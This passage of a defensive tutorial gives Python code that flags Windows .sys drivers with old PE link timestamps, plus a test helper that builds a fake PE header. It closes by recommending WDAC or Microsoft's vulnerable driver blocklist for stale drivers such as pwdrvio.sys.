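    """True when the image was linked more than max_age_years before now."""
    return now - stamp > timedelta(days=365 * max_age_years)


def scan_drivers(directory: str, now=None, max_age_years: int = 10) -> list:
    """Return [(filename, timestamp)] for every .sys older than the threshold."""
    now = now or datetime.now(timezone.utc)
    stale = []
    for name in sorted(os.listdir(directory)):
        if not name.lower().endswith(".sys"):
            continue
        try:
            with open(os.path.join(directory, name), "rb") as fh:
                stamp = pe_timestamp(fh.read(4096))  # headers fit in the first 4 KiB
        except (OSError, ValueError):
            continue  # unreadable, or not a PE image
        if is_stale(stamp, now, max_age_years):
            stale.append((name, stamp))
    return stale


def fake_pe(timestamp: int) -> bytes:
    """Constructed minimal PE header for offline testing (not a real driver)."""
    e_lfanew = 0x80
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    dos = dos.ljust(e_lfanew, b"\0")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x8664, 1, timestamp, 0, 0, 0, 0)
    return dos + b"PE\0\0" + coff


if __name__ == "__main__":
    ts = pe_timestamp(fake_pe(PWDRVIO_TIMESTAMP))
    print("pwdrvio.sys link time:", ts.isoformat())
    print("stale:", is_stale(ts, datetime.now(timezone.utc)))
```

A link timestamp is a triage signal, not proof of a vulnerability (it can be set arbitrarily by the linker, and reproducible builds store a hash there instead), so treat hits as candidates for review; the durable mitigation for a driver like this one is blocking its hash or signer with WDAC or the Microsoft vulnerable driver blocklist rather than relying on detection alone.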